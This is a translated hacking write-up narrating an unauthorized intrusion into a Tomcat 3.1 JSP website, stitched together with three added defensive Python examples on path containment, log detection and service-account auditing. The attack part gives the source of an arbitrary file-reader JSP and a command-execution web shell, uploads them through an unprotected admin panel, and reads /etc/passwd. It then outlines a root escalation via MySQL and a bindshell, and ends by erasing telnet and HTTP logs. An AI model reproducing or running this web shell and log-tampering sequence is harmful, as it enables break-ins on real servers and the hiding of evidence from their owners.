How to intrude into JSP-based websites

Source: Internet
Author: User

By chance I came across a website whose pages looked fresh and well made; the site was developed in JSP. Out of personal interest, I decided to test the security of this system.

telnet www.target.com 8080
GET /maid HTTP/1.1
[Enter]
[Enter]

The returned results are as follows:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

<H1> Error: 404 <H2> Location:/CHINANSL
The web server identifies itself as "Tomcat 3.1". I remember finding a vulnerability in this version and posting it to Bugtraq.

Recall that the parent-directory ("..") trick can escape the web directory, so I tried:

http://target:8080/.../../%00.jsp (NO)
http://target:8080/file/index.jsp (NO)
http://target:8080/index.JSP (NO)
http://target:8080/index.jsp%81 (NO)
http://target:8080/index.js%70 (NO)
http://target:8080/index.jsp%2581 (NO)
http://target:8080/WEB-INF/ (NO)

The security posture looks good so far, so let's dig deeper. Tomcat 3.1 ships with a management tool that lets you view the directories and files under the web root and add contexts. So try:

http://target:8080/admin/

The administrator had neither removed this directory nor restricted access to it. From a security standpoint, this is a very serious mistake.

Next, clicking the "view all context" button lists the names of files and directories under the web root, and a file-upload component is soon found. Using this component, a JSP file is uploaded into the target's web directory:

<%@ page import="java.io.*" %>
<%
// Reads the file named by the "file" request parameter and echoes it line by line.
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try {
    fis = new FileInputStream(file);
    dis = new DataInputStream(fis);
    while (true) {
        try {
            str = dis.readLine();
        } catch (Exception e) {}
        if (str == null) break;
        out.print(str + "<br>");
    }
} catch (IOException e) {}
%>

Then execute:

http://target:8080/upload/test.jsp?file=/etc/passwd



The password file is displayed. The next step, guessing the passwords, failed. Still, this is already the equivalent of having a shell: if the passwords cannot be guessed, IE can serve as the shell environment for now.
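The test.jsp above hands whatever path the `file` parameter names straight to `FileInputStream`, which is why /etc/passwd came back. For contrast, the following is an added example (not code from the original article) of the containment check a file-serving page should apply: the requested name is resolved against one fixed document directory and refused unless the real path, after following symlinks and collapsing "..", is still inside it. It is written in Python rather than JSP so it runs stand-alone; the document directory, the report file and the escaping symlink in `demo()` are constructed.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional


def resolve_within(base_dir: str, requested: str) -> Optional[str]:
    """Return the real path of `requested` if, after resolving symlinks and
    collapsing '..', it lies inside `base_dir`; otherwise return None.

    The comparison is made on the resolved path, not on the string the client
    sent, so '..' sequences, percent-encoded variants decoded upstream, and
    symlinks that point out of the directory are all caught by one check."""
    if "\x00" in requested:                 # NUL would truncate the name in C layers
        return None
    if requested.startswith(("/", "\\")):   # only names relative to the base are meaningful
        return None
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)         # ValueError when candidate is outside base
    except ValueError:
        return None
    return str(candidate)


def read_within(base_dir: str, requested: str) -> Optional[str]:
    """Read a file only when it resolves inside base_dir; None means refused or absent."""
    path = resolve_within(base_dir, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed scenario: a document directory holding one readable report and
    a symlink that points back out to the filesystem root. Returns what each
    request produced so the behaviour can be checked without a web server."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp) / "docs"
        docs.mkdir()
        (docs / "report.txt").write_text("quarterly report\n", encoding="utf-8")
        os.symlink("/", docs / "escape")    # a link that leads out of the directory
        return {
            "plain": read_within(str(docs), "report.txt"),
            "dotdot": read_within(str(docs), "../../etc/passwd"),
            "absolute": read_within(str(docs), "/etc/passwd"),
            "symlink": read_within(str(docs), "escape/etc/passwd"),
            "nul": read_within(str(docs), "report.txt\x00.jsp"),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>8}: {'served' if result is not None else 'refused'}")
```

Only the plain request is served; the parent-directory, absolute-path, symlink and NUL variants are all refused by the same `relative_to` comparison, which is the point of checking the resolved path rather than pattern-matching the raw parameter.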



Write another JSP file:

<%@ page import="java.io.*" %>
<%
// Runs the command named by the "cmd" request parameter and echoes its standard output.
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char) c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>

Upload this JSP file through the same upload component, and there is a shell:

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(Detailed results are not listed here)
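The sequence described so far leaves a distinct trail in the servlet container's access log: a hit on the management context, server-side pages requested from an upload directory, and query parameters carrying absolute file paths or shell commands. The following is an added example, not from the original article, of detection logic run over constructed log lines in common log format. The `/admin/` and `/upload/` prefixes and the parameter names other than `cmd` and `file` are assumptions about the deployment, not facts from the page.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Apache/Tomcat common access-log format (invented lines,
# not from the page or any real server). The first client reproduces the kind of
# sequence the write-up describes; the last two are ordinary visitors.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2001:07:49:13 +0000] "GET /maid HTTP/1.1" 404 312
10.0.0.5 - - [08/Jul/2001:07:52:01 +0000] "GET /admin/ HTTP/1.1" 200 4101
10.0.0.5 - - [08/Jul/2001:07:55:20 +0000] "POST /admin/ HTTP/1.1" 200 88
10.0.0.5 - - [08/Jul/2001:07:56:02 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.1" 200 1580
10.0.0.5 - - [08/Jul/2001:08:01:44 +0000] "GET /upload/cmd.jsp?cmd=ls+-la+/ HTTP/1.1" 200 2200
10.0.0.5 - - [08/Jul/2001:08:03:10 +0000] "GET /upload/cmd.jsp?cmd=ps+aux+%7Cgrep+mysqld HTTP/1.1" 200 140
192.168.1.20 - - [08/Jul/2001:08:05:00 +0000] "GET /index.jsp HTTP/1.1" 200 5120
192.168.1.21 - - [08/Jul/2001:08:06:00 +0000] "GET /news/view.jsp?id=42 HTTP/1.1" 200 3120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Deployment assumptions (not from the page): where the management context lives
# and where user uploads land. "cmd" and "file" are the page's parameter names;
# "command" and "exec" generalise the rule.
ADMIN_PREFIXES = ("/admin/",)
UPLOAD_PREFIXES = ("/upload/",)
COMMAND_PARAMS = {"cmd", "command", "exec"}
SHELL_META = re.compile(r"[|;&`$]")


def rules_for(path: str, query: str) -> List[str]:
    """Return the names of every detection rule a single request trips."""
    hits = []
    if path.startswith(ADMIN_PREFIXES):
        hits.append("admin-context")
    if path.startswith(UPLOAD_PREFIXES) and path.lower().endswith(".jsp"):
        hits.append("jsp-in-upload-dir")      # server-side code where only data should be
    params = parse_qs(query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]
    if any(v.startswith("/") or ".." in v for v in values):
        hits.append("path-traversal")          # absolute or parent-relative file names
    if COMMAND_PARAMS & set(params) or any(SHELL_META.search(v) for v in values):
        hits.append("command-param")           # command-named parameter or shell metacharacters
    return hits


def scan(log_text: str) -> List[Dict[str, str]]:
    """Parse each access-log line and emit one alert per (line, rule) pair."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                           # malformed line: skip it, never abort the scan
        parts = urlsplit(m["target"])
        for rule in rules_for(parts.path, parts.query):
            alerts.append({"ip": m["ip"], "time": m["ts"], "rule": rule,
                           "request": m["method"] + " " + m["target"],
                           "status": m["status"]})
    return alerts


def alerts_by_ip(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Count alerts per client so one source tripping several rules stands out."""
    return dict(Counter(a["ip"] for a in alerts))


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["ip"], a["rule"], a["request"])
    print(alerts_by_ip(found))
```

Because the write-up ends with the attacker editing the web server's logs on the host, a check like this is only worth running over a copy of the access log that has already been forwarded elsewhere; a single client tripping four different rules within a few minutes is the pattern to alert on.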

How to obtain root privileges? After some searching, I found that MySQL was installed on the system, and the MySQL password could be read from the JSP source code. Run:

http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld

Display:

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 .72 /usr/local/data/mysql

The system runs MySQL as root. Now that I knew the MySQL password, I could write a shell program to create a table, put my data into it, then use "select ... into outfile" to create a file on the system so that my program would run whenever a user executed su. (Remember the apache.org intrusion? This is the method the hackers used.)

After that it would be relatively simple: upload a program such as a bindshell, run it to obtain the nobody account, then use the setuid shell created by su root to become root.

However, the following test produced a quite surprising result:

http://target:8080/upload/cmd.jsp?cmd=id

Display:

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

So this web shell was ROOT all along! How did the administrator configure security?

http://target:8080/upload/cmd.jsp?cmd=ps+aux

It was all running as root (output not listed).
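Both the database and the servlet container here run as root, which is what turned an uploaded JSP into a root shell with no privilege escalation needed. The following is an added example, not from the original article, of the audit check a defender would run over `ps aux` output: each service covered by policy is compared against the unprivileged account it is expected to use, and every mismatch is reported. The process listing, the executable paths and the account mapping are constructed for the example.

```python
import os
from typing import Dict, List

# Constructed `ps aux` listing (invented processes and paths, not from the page).
# Two network-facing services run as root; httpd runs under an unprivileged account.
SAMPLE_PS = """\
USER       PID %CPU %MEM   VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  1104   476 ?        S    Jun28   0:04 init
root       412  0.0  0.3  2180  1128 ?        S    Jun28   0:00 /usr/sbin/sshd
root       874  0.2  1.9 17300  4800 ?        S    Jun28   0:72 /usr/local/libexec/mysqld --datadir=/usr/local/data/mysql
root       901  1.1  8.4 92184 21400 ?        S    Jun28   3:15 /usr/local/java/bin/java -jar /opt/tomcat/lib/tomcat.jar
nobody     950  0.0  0.9  6120  2310 ?        S    Jun28   0:02 /usr/sbin/httpd
"""

# Policy (an assumption for this example, not from the page): the unprivileged
# account each network-facing service is expected to run under, keyed by the
# executable's base name.
EXPECTED_ACCOUNT = {"mysqld": "mysql", "java": "tomcat", "httpd": "nobody"}


def parse_ps(ps_text: str) -> List[Dict[str, str]]:
    """Split `ps aux` output into records. COMMAND is the 11th column and may
    itself contain spaces, so the line is split at most ten times."""
    records = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue                                # truncated or blank line
        records.append({"user": fields[0], "pid": fields[1], "command": fields[10]})
    return records


def service_account_violations(ps_text: str) -> List[Dict[str, str]]:
    """Report every policy-covered service not running under its expected account.
    Processes the policy does not name (init, sshd) are left alone."""
    violations = []
    for rec in parse_ps(ps_text):
        exe = os.path.basename(rec["command"].split()[0])
        expected = EXPECTED_ACCOUNT.get(exe)
        if expected is not None and rec["user"] != expected:
            violations.append({**rec, "service": exe, "expected": expected})
    return violations


if __name__ == "__main__":
    for v in service_account_violations(SAMPLE_PS):
        print(f"pid {v['pid']}: {v['service']} runs as {v['user']}, expected {v['expected']}")
```

On the constructed listing the check flags mysqld and java; had the servlet container been running under a dedicated account, the uploaded cmd.jsp would have executed with that account's rights rather than uid 0, and the `select ... into outfile` plan would have had nothing to write as root either.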

The rest:

1. Delete my telnet records.

2. Delete the HTTP logs.

To clean the logs, I used cat xxx | grep -v "IP" > temp and then overwrote the log files with the edited copy.


